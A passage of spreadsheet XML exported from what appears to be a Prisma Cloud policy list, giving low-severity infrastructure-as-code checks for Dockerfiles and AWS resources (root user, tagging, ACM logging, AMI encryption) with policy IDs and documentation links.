          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF681" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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1" t="inlineStr">
        <is>
          <t>395cad1d-c9ff-4c55-a199-45cd2eba6d6c</t>
        </is>
      </c>
      <c r="AI681" t="inlineStr"/>
      <c r="AJ681" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK681" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" t="inlineStr"/>
      <c r="B682" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C682" s="2" t="inlineStr"/>
      <c r="D682" t="inlineStr"/>
      <c r="E682" t="inlineStr"/>
      <c r="F682" t="inlineStr"/>
      <c r="G682" t="b">
        <v>1</v>
      </c>
      <c r="H6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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J682" t="inlineStr">
        <is>
          <t>IaC:General:RUN</t>
        </is>
      </c>
      <c r="K682" t="inlineStr">
        <is>
          <t>Update instructions are used alone in a Dockerfile</t>
        </is>
      </c>
      <c r="L682" t="inlineStr"/>
      <c r="M682" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N682" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O682" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P682" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q682" t="inlineStr"/>
      <c r="R682" t="inlineStr"/>
      <c r="S682" t="inlineStr"/>
      <c r="T682" t="b">
        <v>0</v>
      </c>
      <c r="U682" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V682" t="inlineStr">
        <is>
          <t>IaC:General:RUN</t>
        </is>
      </c>
      <c r="W682" t="inlineStr">
        <is>
          <t>Ensure update instructions are not use alone in the Dockerfile</t>
        </is>
      </c>
      <c r="X682" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-update-instructions-are-not-used-alone-in-the-dockerfile</t>
        </is>
      </c>
      <c r="Y682" t="inlineStr"/>
      <c r="Z682" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["RUN"]}</t>
        </is>
      </c>
      <c r="AA682" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB682" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC682" t="inlineStr">
        <is>
          <t>CKV_DOCKER_5</t>
        </is>
      </c>
      <c r="AD682" t="b">
        <v>1</v>
      </c>
      <c r="AE682" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF682" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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2" t="inlineStr">
        <is>
          <t>7cc86b56-dbe0-45a4-98d0-1b982cbce03c</t>
        </is>
      </c>
      <c r="AI682" t="inlineStr"/>
      <c r="AJ682" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK682" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" t="inlineStr"/>
      <c r="B683" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C683" s="2" t="inlineStr"/>
      <c r="D683" t="inlineStr"/>
      <c r="E683" t="inlineStr"/>
      <c r="F683" t="inlineStr"/>
      <c r="G683" t="b">
        <v>1</v>
      </c>
      <c r="H6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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J683" t="inlineStr">
        <is>
          <t>IaC:General:USER</t>
        </is>
      </c>
      <c r="K683" t="inlineStr">
        <is>
          <t>Last USER is root</t>
        </is>
      </c>
      <c r="L683" t="inlineStr"/>
      <c r="M683" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N683" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O683" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P683" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q683" t="inlineStr"/>
      <c r="R683" t="inlineStr"/>
      <c r="S683" t="inlineStr"/>
      <c r="T683" t="b">
        <v>0</v>
      </c>
      <c r="U683" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V683" t="inlineStr">
        <is>
          <t>IaC:General:USER</t>
        </is>
      </c>
      <c r="W683" t="inlineStr">
        <is>
          <t>Ensure the last USER is not root</t>
        </is>
      </c>
      <c r="X683" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-the-last-user-is-not-root</t>
        </is>
      </c>
      <c r="Y683" t="inlineStr"/>
      <c r="Z683" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["USER"]}</t>
        </is>
      </c>
      <c r="AA683" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB683" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC683" t="inlineStr">
        <is>
          <t>CKV_DOCKER_8</t>
        </is>
      </c>
      <c r="AD683" t="b">
        <v>1</v>
      </c>
      <c r="AE683" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF683" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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3" t="inlineStr">
        <is>
          <t>dcbdd1fd-5df0-4800-9d03-5fdbe2a5c401</t>
        </is>
      </c>
      <c r="AI683" t="inlineStr"/>
      <c r="AJ683" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK683" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" t="inlineStr"/>
      <c r="B684" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C684" s="2" t="inlineStr"/>
      <c r="D684" t="inlineStr"/>
      <c r="E684" t="inlineStr"/>
      <c r="F684" t="inlineStr"/>
      <c r="G684" t="b">
        <v>1</v>
      </c>
      <c r="H6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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J684" t="inlineStr">
        <is>
          <t>IaC:General:aws-acm</t>
        </is>
      </c>
      <c r="K684" t="inlineStr">
        <is>
          <t>AWS ACM certificates does not have logging preference</t>
        </is>
      </c>
      <c r="L684" t="inlineStr"/>
      <c r="M684" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N684" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O684" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P684" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q684" t="inlineStr"/>
      <c r="R684" t="inlineStr"/>
      <c r="S684" t="inlineStr"/>
      <c r="T684" t="b">
        <v>0</v>
      </c>
      <c r="U684" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V684" t="inlineStr">
        <is>
          <t>IaC:General:aws-acm-certificate</t>
        </is>
      </c>
      <c r="W684" t="inlineStr">
        <is>
          <t>Verify logging preference for ACM certificates</t>
        </is>
      </c>
      <c r="X684" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-acm-certificates-has-logging-preference</t>
        </is>
      </c>
      <c r="Y684" t="inlineStr"/>
      <c r="Z684" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_acm_certificate"]}</t>
        </is>
      </c>
      <c r="AA684" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB684" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC684" t="inlineStr">
        <is>
          <t>CKV_AWS_234</t>
        </is>
      </c>
      <c r="AD684" t="b">
        <v>1</v>
      </c>
      <c r="AE684" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF684" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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4" t="inlineStr">
        <is>
          <t>621fd08f-2fd2-4607-8203-a1f8c47477c9</t>
        </is>
      </c>
      <c r="AI684" t="inlineStr"/>
      <c r="AJ684" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK684" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" t="inlineStr"/>
      <c r="B685" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C685" s="2" t="inlineStr"/>
      <c r="D685" t="inlineStr"/>
      <c r="E685" t="inlineStr"/>
      <c r="F685" t="inlineStr"/>
      <c r="G685" t="b">
        <v>1</v>
      </c>
      <c r="H6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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J685" t="inlineStr">
        <is>
          <t>IaC:General:aws-acm-certificate,aws-acmpca-certificate-authority,aws-api-gateway</t>
        </is>
      </c>
      <c r="K685" t="inlineStr">
        <is>
          <t>AWS resources that support tags do not have Tags</t>
        </is>
      </c>
      <c r="L685" t="inlineStr"/>
      <c r="M685" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N685" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O685" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P685" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q685" t="inlineStr"/>
      <c r="R685" t="inlineStr"/>
      <c r="S685" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T685" t="b">
        <v>0</v>
      </c>
      <c r="U685" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V685" t="inlineStr">
        <is>
          <t>IaC:General:aws-acm-certificate,aws-acmpca-certificate-authority,aws-api-gateway-api-key,aws-api-gateway-client-certificate,aws-api-gateway-domain-name,aws-api-gateway-rest-api,aws-api-gateway-stage,aws-api-gateway-usage-plan,aws-api-gateway-vpc-link,aws-apigatewayv2-api,aws-apigatewayv2-domain-name,aws-apigatewayv2-stage,aws-apigatewayv2-vpc-link,aws-accessanalyzer-analyzer,aws-appmesh-mesh,aws-appmesh-route,aws-appmesh-virtual-node,aws-appmesh-virtual-router,aws-appmesh-virtual-service,aws-appsync-graphql-api,aws-athena-workgroup,aws-backup-plan,aws-backup-vault,aws-batch-compute-environment,aws-cloud9-environment-ec2,aws-cloudformation-stack,aws-cloudformation-stack-set,aws-cloudfront-distribution,aws-cloudhsm-v2-cluster,aws-cloudtrail,aws-cloudwatch-event-rule,aws-cloudwatch-log-group,aws-cloudwatch-metric-alarm,aws-codebuild-project,aws-codecommit-repository,aws-codepipeline,aws-codepipeline-webhook,aws-codestarnotifications-notification-rule,aws-cognito-identity-pool,aws-cognito-user-pool,aws-config-aggregate-authorization,aws-config-config-rule,aws-config-configuration-aggregator,aws-dlm-lifecycle-policy,aws-datapipeline-pipeline,aws-datasync-agent,aws-datasync-location-efs,aws-datasync-location-nfs,aws-datasync-location-s3,aws-datasync-location-smb,aws-datasync-task,aws-dms-endpoint,aws-dms-replication-instance,aws-dms-replication-subnet-group,aws-dms-replication-task,aws-dx-connection,aws-dx-hosted-private-virtual-interface-accepter,aws-dx-hosted-public-virtual-interface-accepter,aws-dx-hosted-transit-virtual-interface-accepter,aws-dx-lag,aws-dx-private-virtual-interface,aws-dx-public-virtual-interface,aws-dx-transit-virtual-interface,aws-directory-service-directory,aws-docdb-cluster,aws-docdb-cluster-instance,aws-docdb-cluster-parameter-group,aws-docdb-subnet-group,aws-dynamodb-table,aws-dax-cluster,aws-ami,aws-ami-copy,aws-ami-from-instance,aws-ebs-snapshot,aws-ebs-snapshot-copy,aws-ebs-volume,aws-ec2-capacity-reservation,aws-ec2-client-vpn-endpoint,aws-ec2-fleet,aws-ec2-local-gateway-route-table-vpc-association,aws-ec2-traffic-mirror-filter,aws-ec2-traffic-mirror-session,aws-ec2-traffic-mirror-target,aws-ec2-transit-gateway,aws-ec2-transit-gateway-peering-attachment,aws-ec2-transit-gateway-peering-attachment-accepter,aws-ec2-transit-gateway-route-table,aws-ec2-transit-gateway-vpc-attachment,aws-ec2-transit-gateway-vpc-attachment-accepter,aws-eip,aws-instance,aws-launch-template,aws-placement-group,aws-spot-fleet-request,aws-spot-instance-request,aws-ecr-repository,aws-ecs-capacity-provider,aws-ecs-cluster,aws-ecs-service,aws-ecs-task-definition,aws-efs-access-point,aws-efs-file-system,aws-eks-cluster,aws-eks-fargate-profile,aws-eks-node-group,aws-elasticache-cluster,aws-elasticache-replication-group,aws-elastic-beanstalk-application,aws-elastic-beanstalk-application-version,aws-elastic-beanstalk-environment,aws-elb,aws-lb,aws-lb-target-group,aws-emr-cluster,aws-elasticsearch-domain,aws-fsx-lustre-file-system,aws-fsx-windows-file-system,aws-gamelift-alias,aws-gamelift-build,aws-gamelift-fleet,aws-gamelift-game-session-queue,aws-glacier-vault,aws-globalaccelerator-accelerator,aws-glue-crawler,aws-glue-job,aws-glue-trigger,aws-guardduty-detector,aws-guardduty-ipset,aws-guardduty-threatintelset,aws-iam-role,aws-iam-user,aws-inspector-assessment-template,aws-inspector-resource-group,aws-iot-topic-rule,aws-kms-external-key,aws-kms-key,aws-kinesis-analytics-application,aws-kinesis-stream,aws-kinesis-firehose-delivery-stream,aws-kinesis-video-stream,aws-lambda-function,aws-licensemanager-license-configuration,aws-lightsail-instance,aws-mq-broker,aws-mq-configuration,aws-msk-cluster,aws-media-convert-queue,aws-media-package-channel,aws-media-store-container,aws-neptune-cluster,aws-neptune-cluster-instance,aws-neptune-cluster-parameter-group,aws-neptune-event-subscription,aws-neptune-parameter-group,aws-neptune-subnet-group,aws-opsworks-custom-layer,aws-opsworks-ganglia-layer,aws-opsworks-haproxy-layer,aws-opsworks-java-app-layer,aws-opsworks-memcached-layer,aws-opsworks-mysql-layer,aws-opsworks-nodejs-app-layer,aws-opsworks-php-app-layer,aws-opsworks-rails-app-layer,aws-opsworks-stack,aws-opsworks-static-web-layer,aws-organizations-account,aws-pinpoint-app,aws-qldb-ledger,aws-ram-resource-share,aws-db-cluster-snapshot,aws-db-event-subscription,aws-db-instance,aws-db-option-group,aws-db-parameter-group,aws-db-security-group,aws-db-snapshot,aws-db-subnet-group,aws-rds-cluster,aws-rds-cluster-endpoint,aws-rds-cluster-instance,aws-rds-cluster-parameter-group,aws-redshift-cluster,aws-redshift-event-subscription,aws-redshift-parameter-group,aws-redshift-snapshot-copy-grant,aws-redshift-snapshot-schedule,aws-redshift-subnet-group,aws-resourcegroups-group,aws-route53-health-check,aws-route53-zone,aws-route53-resolver-endpoint,aws-route53-resolver-rule,aws-s3-bucket,aws-s3-bucket-analytics-configuration,aws-s3-bucket-metric,aws-s3-bucket-object,aws-sns-topic,aws-sqs-queue,aws-ssm-activation,aws-ssm-document,aws-ssm-maintenance-window,aws-ssm-parameter,aws-ssm-patch-baseline,aws-swf-domain,aws-sagemaker-endpoint,aws-sagemaker-endpoint-configuration,aws-sagemaker-model,aws-sagemaker-notebook-instance,aws-secretsmanager-secret,aws-servicecatalog-portfolio,aws-service-discovery-http-namespace,aws-service-discovery-private-dns-namespace,aws-service-discovery-public-dns-namespace,aws-service-discovery-service,aws-sfn-activity,aws-sfn-state-machine,aws-storagegateway-cached-iscsi-volume,aws-storagegateway-gateway,aws-storagegateway-nfs-file-share,aws-storagegateway-smb-file-share,aws-transfer-server,aws-transfer-user,aws-customer-gateway,aws-default-network-acl,aws-default-route-table,aws-default-security-group,aws-default-subnet,aws-default-vpc,aws-default-vpc-dhcp-options,aws-egress-only-internet-gateway,aws-flow-log,aws-internet-gateway,aws-nat-gateway,aws-network-acl,aws-network-interface,aws-route-table,aws-security-group,aws-subnet,aws-vpc,aws-vpc-dhcp-options,aws-vpc-endpoint,aws-vpc-endpoint-service,aws-vpc-peering-connection,aws-vpc-peering-connection-accepter,aws-vpn-connection,aws-vpn-gateway,aws-waf-rate-based-rule,aws-waf-rule,aws-waf-rule-group,aws-waf-web-acl,aws-wafregional-rate-based-rule,aws-wafregional-rule,aws-wafregional-rule-group,aws-wafregional-web-acl,aws-wafv2-ip-set,aws-wafv2-regex-pattern-set,aws-wafv2-rule-group,aws-wafv2-web-acl,aws-workspaces-directory,aws-workspaces-workspace</t>
        </is>
      </c>
      <c r="W685" t="inlineStr">
        <is>
          <t>Ensure taggable resources are tagged</t>
        </is>
      </c>
      <c r="X685" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-26</t>
        </is>
      </c>
      <c r="Y685" t="inlineStr"/>
      <c r="Z685" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_acm_certificate","aws_acmpca_certificate_authority","aws_api_gateway_api_key","aws_api_gateway_client_certificate","aws_api_gateway_domain_name","aws_api_gateway_rest_api","aws_api_gateway_stage","aws_api_gateway_usage_plan","aws_api_gateway_vpc_link","aws_apigatewayv2_api","aws_apigatewayv2_domain_name","aws_apigatewayv2_stage","aws_apigatewayv2_vpc_link","aws_accessanalyzer_analyzer","aws_appmesh_mesh","aws_appmesh_route","aws_appmesh_virtual_node","aws_appmesh_virtual_router","aws_appmesh_virtual_service","aws_appsync_graphql_api","aws_athena_workgroup","aws_backup_plan","aws_backup_vault","aws_batch_compute_environment","aws_cloud9_environment_ec2","aws_cloudformation_stack","aws_cloudformation_stack_set","aws_cloudfront_distribution","aws_cloudhsm_v2_cluster","aws_cloudtrail","aws_cloudwatch_event_rule","aws_cloudwatch_log_group","aws_cloudwatch_metric_alarm","aws_codebuild_project","aws_codecommit_repository","aws_codepipeline","aws_codepipeline_webhook","aws_codestarnotifications_notification_rule","aws_cognito_identity_pool","aws_cognito_user_pool","aws_config_aggregate_authorization","aws_config_config_rule","aws_config_configuration_aggregator","aws_dlm_lifecycle_policy","aws_datapipeline_pipeline","aws_datasync_agent","aws_datasync_location_efs","aws_datasync_location_nfs","aws_datasync_location_s3","aws_datasync_location_smb","aws_datasync_task","aws_dms_endpoint","aws_dms_replication_instance","aws_dms_replication_subnet_group","aws_dms_replication_task","aws_dx_connection","aws_dx_hosted_private_virtual_interface_accepter","aws_dx_hosted_public_virtual_interface_accepter","aws_dx_hosted_transit_virtual_interface_accepter","aws_dx_lag","aws_dx_private_virtual_interface","aws_dx_public_virtual_interface","aws_dx_transit_virtual_interface","aws_directory_service_directory","aws_docdb_cluster","aws_docdb_cluster_instance","aws_docdb_cluster_parameter_group","aws_docdb_subnet_group","aws_dynamodb_table","aws_dax_cluster","aws_ami","aws_ami_copy","aws_ami_from_instance","aws_ebs_snapshot","aws_ebs_snapshot_copy","aws_ebs_volume","aws_ec2_capacity_reservation","aws_ec2_client_vpn_endpoint","aws_ec2_fleet","aws_ec2_local_gateway_route_table_vpc_association","aws_ec2_traffic_mirror_filter","aws_ec2_traffic_mirror_session","aws_ec2_traffic_mirror_target","aws_ec2_transit_gateway","aws_ec2_transit_gateway_peering_attachment","aws_ec2_transit_gateway_peering_attachment_accepter","aws_ec2_transit_gateway_route_table","aws_ec2_transit_gateway_vpc_attachment","aws_ec2_transit_gateway_vpc_attachment_accepter","aws_eip","aws_instance","aws_launch_template","aws_placement_group","aws_spot_fleet_request","aws_spot_instance_request","aws_ecr_repository","aws_ecs_capacity_provider","aws_ecs_cluster","aws_ecs_service","aws_ecs_task_definition","aws_efs_access_point","aws_efs_file_system","aws_eks_cluster","aws_eks_fargate_profile","aws_eks_node_group","aws_elasticache_cluster","aws_elasticache_replication_group","aws_elastic_beanstalk_application","aws_elastic_beanstalk_application_version","aws_elastic_beanstalk_environment","aws_elb","aws_lb","aws_lb_target_group","aws_emr_cluster","aws_elasticsearch_domain","aws_fsx_lustre_file_system","aws_fsx_windows_file_system","aws_gamelift_alias","aws_gamelift_build","aws_gamelift_fleet","aws_gamelift_game_session_queue","aws_glacier_vault","aws_globalaccelerator_accelerator","aws_glue_crawler","aws_glue_job","aws_glue_trigger","aws_guardduty_detector","aws_guardduty_ipset","aws_guardduty_threatintelset","aws_iam_role","aws_iam_user","aws_inspector_assessment_template","aws_inspector_resource_group","aws_iot_topic_rule","aws_kms_external_key","aws_kms_key","aws_kinesis_analytics_application","aws_kinesis_stream","aws_kinesis_firehose_delivery_stream","aws_kinesis_video_stream","aws_lambda_function","aws_licensemanager_license_configuration","aws_lightsail_instance","aws_mq_broker","aws_mq_configuration","aws_msk_cluster","aws_media_convert_queue","aws_media_package_channel","aws_media_store_container","aws_neptune_cluster","aws_neptune_cluster_instance","aws_neptune_cluster_parameter_group","aws_neptune_event_subscription","aws_neptune_parameter_group","aws_neptune_subnet_group","aws_opsworks_custom_layer","aws_opsworks_ganglia_layer","aws_opsworks_haproxy_layer","aws_opsworks_java_app_layer","aws_opsworks_memcached_layer","aws_opsworks_mysql_layer","aws_opsworks_nodejs_app_layer","aws_opsworks_php_app_layer","aws_opsworks_rails_app_layer","aws_opsworks_stack","aws_opsworks_static_web_layer","aws_organizations_account","aws_pinpoint_app","aws_qldb_ledger","aws_ram_resource_share","aws_db_cluster_snapshot","aws_db_event_subscription","aws_db_instance","aws_db_option_group","aws_db_parameter_group","aws_db_security_group","aws_db_snapshot","aws_db_subnet_group","aws_rds_cluster","aws_rds_cluster_endpoint","aws_rds_cluster_instance","aws_rds_cluster_parameter_group","aws_redshift_cluster","aws_redshift_event_subscription","aws_redshift_parameter_group","aws_redshift_snapshot_copy_grant","aws_redshift_snapshot_schedule","aws_redshift_subnet_group","aws_resourcegroups_group","aws_route53_health_check","aws_route53_zone","aws_route53_resolver_endpoint","aws_route53_resolver_rule","aws_s3_bucket","aws_s3_bucket_analytics_configuration","aws_s3_bucket_metric","aws_s3_bucket_object","aws_sns_topic","aws_sqs_queue","aws_ssm_activation","aws_ssm_document","aws_ssm_maintenance_window","aws_ssm_parameter","aws_ssm_patch_baseline","aws_swf_domain","aws_sagemaker_endpoint","aws_sagemaker_endpoint_configuration","aws_sagemaker_model","aws_sagemaker_notebook_instance","aws_secretsmanager_secret","aws_servicecatalog_portfolio","aws_service_discovery_http_namespace","aws_service_discovery_private_dns_namespace","aws_service_discovery_public_dns_namespace","aws_service_discovery_service","aws_sfn_activity","aws_sfn_state_machine","aws_storagegateway_cached_iscsi_volume","aws_storagegateway_gateway","aws_storagegateway_nfs_file_share","aws_storagegateway_smb_file_share","aws_transfer_server","aws_transfer_user","aws_customer_gateway","aws_default_network_acl","aws_default_route_table","aws_default_security_group","aws_default_subnet","aws_default_vpc","aws_default_vpc_dhcp_options","aws_egress_only_internet_gateway","aws_flow_log","aws_internet_gateway","aws_nat_gateway","aws_network_acl","aws_network_interface","aws_route_table","aws_security_group","aws_subnet","aws_vpc","aws_vpc_dhcp_options","aws_vpc_endpoint","aws_vpc_endpoint_service","aws_vpc_peering_connection","aws_vpc_peering_connection_accepter","aws_vpn_connection","aws_vpn_gateway","aws_waf_rate_based_rule","aws_waf_rule","aws_waf_rule_group","aws_waf_web_acl","aws_wafregional_rate_based_rule","aws_wafregional_rule","aws_wafregional_rule_group","aws_wafregional_web_acl","aws_wafv2_ip_set","aws_wafv2_regex_pattern_set","aws_wafv2_rule_group","aws_wafv2_web_acl","aws_workspaces_directory","aws_workspaces_workspace"]}</t>
        </is>
      </c>
      <c r="AA685" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB685" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC685" t="inlineStr">
        <is>
          <t>CKV_AWS_CUSTOM_1</t>
        </is>
      </c>
      <c r="AD685" t="b">
        <v>1</v>
      </c>
      <c r="AE685" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF685" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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5" t="inlineStr">
        <is>
          <t>3c8e89b8-5f3f-41a5-996e-f2b6083c3605</t>
        </is>
      </c>
      <c r="AI685" t="inlineStr"/>
      <c r="AJ685" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK685" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" t="inlineStr"/>
      <c r="B686" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C686" s="2" t="inlineStr"/>
      <c r="D686" t="inlineStr"/>
      <c r="E686" t="inlineStr"/>
      <c r="F686" t="inlineStr"/>
      <c r="G686" t="b">
        <v>1</v>
      </c>
      <c r="H6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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J686" t="inlineStr">
        <is>
          <t>IaC:General:aws-ami</t>
        </is>
      </c>
      <c r="K686" t="inlineStr">
        <is>
          <t>AWS AMIs are not encrypted by Key Management Service (KMS) using Customer Managed Keys (CMKs)</t>
        </is>
      </c>
      <c r="L686" t="inlineStr"/>
      <c r="M686" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N686" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O686" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P686" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q686" t="inlineStr"/>
      <c r="R686" t="inlineStr"/>
      <c r="S686" t="inlineStr"/>
      <c r="T686" t="b">
        <v>0</v>
      </c>
      <c r="U686" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V686" t="inlineStr">
        <is>
          <t>IaC:General:aws-ami</t>
        </is>
      </c>
      <c r="W686" t="inlineStr">
        <is>
          <t>Ensure AMIs are encrypted using KMS CMKs</t>
        </is>
      </c>
      <c r="X686" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-amis-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks</t>
        </is>
      </c>
      <c r="Y686" t="inlineStr"/>
      <c r="Z686" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_ami"]}</t>
        </is>
      </c>
      <c r="AA686" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB686" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC686" t="inlineStr">
        <is>
          <t>CKV_AWS_204</t>
        </is>
      </c>
      <c r="AD686" t="b">
        <v>1</v>
      </c>
      <c r="AE686" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF686" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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6" t="inlineStr">
        <is>
          <t>63cbc1a4-ad46-4bca-8d20-aabeb4afe527</t>
        </is>
      </c>
      <c r="AI686" t="inlineStr"/>
      <c r="AJ686" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK686" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" t="inlineStr"/>
      <c r="B687" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C687" s="2" t="inlineStr"/>
      <c r="D687" t="inlineStr"/>
      <c r="E687" t="inlineStr"/>
      <c r="F687" t="inlineStr"/>
      <c r="G687" t="b">
        <v>1</v>
      </c>
      <c r="H6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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J687" t="inlineStr">
        <is>
          <t>IaC:General:aws-ami</t>
        </is>
      </c>
      <c r="K687" t="inlineStr">
        <is>
          <t>AWS AMI copying does not use a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L687" t="inlineStr"/>
      <c r="M687" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N687" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O687" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P687" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q687" t="inlineStr"/>
      <c r="R687" t="inlineStr"/>
      <c r="S687" t="inlineStr"/>
      <c r="T687" t="b">
        <v>0</v>
      </c>
      <c r="U687" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V687" t="inlineStr">
        <is>
          <t>IaC:General:aws-ami-copy</t>
        </is>
      </c>
      <c r="W687" t="inlineStr">
        <is>
          <t>Ensure AMI copying uses a CMK</t>
        </is>
      </c>
      <c r="X687" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-ami-copying-uses-a-customer-managed-key-cmk</t>
        </is>
      </c>
      <c r="Y687" t="inlineStr"/>
      <c r="Z687" t="inlineStr">
